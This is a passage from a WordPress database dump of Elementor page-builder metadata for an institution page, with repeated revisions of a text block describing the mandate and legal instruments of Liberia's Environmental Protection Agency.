id=\\\"7380147\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainternet%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26763,3907,'_elementor_conditions','a:4:{i:0;s:28:\"include/singular/institution\";i:1;s:41:\"include/singular/in_institutions_category\";i:2;s:50:\"include/singular/in_institutions_category_children\";i:3;s:38:\"include/singular/institution_by_author\";}'),(26764,3907,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:18:\"single/institution\";s:10:\"preview_id\";s:4:\"1582\";}'),(26766,3908,'_elementor_edit_mode','builder'),(26767,3908,'_elementor_template_type','wp-post'),(26768,3908,'_elementor_version','2.7.5'),(26769,3908,'_wp_page_template','default'),(26770,3908,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7516eed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Protection Agency (EPA) is the regulatory Institution of the Government of Liberia for the sustainable management of the environment and its natural resources. The Agency was established by an act of the Legislature November 26, 2002 and published into hand bill on April 30, 2003.<\\/p><p>The EPA operates on three basic legal Instruments: The National Environmental Policy (NEP), The Environmental Management and Protection Law of Liberia and the Act Creating the Environmental Protection Agency. Of these three instruments, the National Environmental Policy ordered the creation of the Environmental Protection Agency to ensure sound environmental management and put in place measure to avoid irreparable damage to the country\\u2019s natural resources. The NEP seeks to harmonize cross cutting functions between and amongst agencies. The NEP seeks to ensure long-term economic prosperity of Liberia through sustainable social and economic development of the generation without endangering the potential of future generation. The objective of the NEP is to improve the physical environment, the quality of life and the improvement of economic and social living condition of the citizenry present and future generations. It also seeks to ensure reconciliation and coordination between economic development and growth with the sustainable management of the natural resources. A National Environmental Policy provides a broad framework for the implementation of national objectives and plans.<\\/p><p>The Environmental Protection and Management Law (EPML) of Liberia establishes a legal framework for the sustainable development, management and protection of the environment by the Environment Protection Agency in partnership with regulatory Ministries and organizations and in a close and responsive relationship with the people of Liberia; and to provide high quality information and advice on the state of the environment and for matters connected therewith. The EMPL have several principles and objectives to include but not limited to the following: The principle of sustainable development; The pre-cautionary principle, The polluter - pays principle, The principle of inter-generational equity, The principle of public participation, The principle of international co-operation in the management of environmental resources shared by two or more states; and Other principles of natural resources and environmental management.<\\/p><p>The Act creating the Agency provides the legal mandates and authority to manage coordinate, monitor and supervise in consultation with relevant line Ministries, Agencies and organization, and other relevant stakeholders for the protection of the environment and sustainable use of natural resources. The act details the functions of the EPA from the Policy Council to environmental inspectors. The Act also clearly explain the entire environmental impact assessment (EIA) process in its totality.<\\/p><h5>Mandate<\\/h5><p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6cf88ad\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"epa\\\",\\\"tag_id\\\":\\\"52\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"epa\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4b4838c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e6d88a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"89a8be2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df7fe5f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:epa\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(26771,3908,'_thumbnail_id','2715'),(26772,3908,'_elementor_controls_usage','a:7:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:21:\"section_divider_style\";a:2:{s:5:\"color\";i:1;s:3:\"gap\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(26774,3909,'_elementor_edit_mode','builder'),(26775,3909,'_elementor_template_type','wp-post'),(26776,3909,'_elementor_version','2.7.5'),(26777,3909,'_wp_page_template','default'),(26778,3909,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7516eed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Protection Agency (EPA) is the regulatory Institution of the Government of Liberia for the sustainable management of the environment and its natural resources. The Agency was established by an act of the Legislature November 26, 2002 and published into hand bill on April 30, 2003.<\\/p><p>The EPA operates on three basic legal Instruments: The National Environmental Policy (NEP), The Environmental Management and Protection Law of Liberia and the Act Creating the Environmental Protection Agency. Of these three instruments, the National Environmental Policy ordered the creation of the Environmental Protection Agency to ensure sound environmental management and put in place measure to avoid irreparable damage to the country\\u2019s natural resources. The NEP seeks to harmonize cross cutting functions between and amongst agencies. The NEP seeks to ensure long-term economic prosperity of Liberia through sustainable social and economic development of the generation without endangering the potential of future generation. The objective of the NEP is to improve the physical environment, the quality of life and the improvement of economic and social living condition of the citizenry present and future generations. It also seeks to ensure reconciliation and coordination between economic development and growth with the sustainable management of the natural resources. A National Environmental Policy provides a broad framework for the implementation of national objectives and plans.<\\/p><p>The Environmental Protection and Management Law (EPML) of Liberia establishes a legal framework for the sustainable development, management and protection of the environment by the Environment Protection Agency in partnership with regulatory Ministries and organizations and in a close and responsive relationship with the people of Liberia; and to provide high quality information and advice on the state of the environment and for matters connected therewith. The EMPL have several principles and objectives to include but not limited to the following: The principle of sustainable development; The pre-cautionary principle, The polluter - pays principle, The principle of inter-generational equity, The principle of public participation, The principle of international co-operation in the management of environmental resources shared by two or more states; and Other principles of natural resources and environmental management.<\\/p><p>The Act creating the Agency provides the legal mandates and authority to manage coordinate, monitor and supervise in consultation with relevant line Ministries, Agencies and organization, and other relevant stakeholders for the protection of the environment and sustainable use of natural resources. The act details the functions of the EPA from the Policy Council to environmental inspectors. The Act also clearly explain the entire environmental impact assessment (EIA) process in its totality.<\\/p><h5>Mandate<\\/h5><p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6cf88ad\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"epa\\\",\\\"tag_id\\\":\\\"52\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"epa\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4b4838c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e6d88a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"89a8be2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df7fe5f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:epa\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(26779,3909,'_thumbnail_id','2715'),(26780,3909,'_elementor_controls_usage','a:7:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:21:\"section_divider_style\";a:2:{s:5:\"color\";i:1;s:3:\"gap\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(26783,3910,'_elementor_edit_mode','builder'),(26784,3910,'_elementor_template_type','single-post'),(26785,3910,'_elementor_version','3.4.0'),(26786,3910,'_elementor_pro_version','3.3.6'),(26787,3910,'_wp_page_template','default'),(26788,3910,'_elementor_data','[{\"id\":\"12002fa\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"090d30d\"}]},\"elements\":[{\"id\":\"c8cd4ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d4bec19\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"cc70076\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4aa672a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":78.09},\"elements\":[{\"id\":\"b15ea6e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"9099e3a\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"44d8a81\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":true},{\"id\":\"f1c39ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":21.855},\"elements\":[{\"id\":\"6e47c97\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"204b950\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainstitution_logo%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"7380147\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainternet%22%7D\\\"]\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26790,3910,'_elementor_conditions','a:4:{i:0;s:28:\"include/singular/institution\";i:1;s:41:\"include/singular/in_institutions_category\";i:2;s:50:\"include/singular/in_institutions_category_children\";i:3;s:38:\"include/singular/institution_by_author\";}'),(26791,3910,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:18:\"single/institution\";s:10:\"preview_id\";s:4:\"1582\";}'),(26793,3911,'_elementor_edit_mode','builder'),(26794,3911,'_elementor_template_type','single-post'),(26795,3911,'_elementor_version','3.4.0'),(26796,3911,'_elementor_pro_version','3.3.6'),(26797,3911,'_wp_page_template','default'),(26798,3911,'_elementor_data','[{\"id\":\"12002fa\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"090d30d\"}]},\"elements\":[{\"id\":\"c8cd4ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d4bec19\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"cc70076\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4aa672a\",\"elTy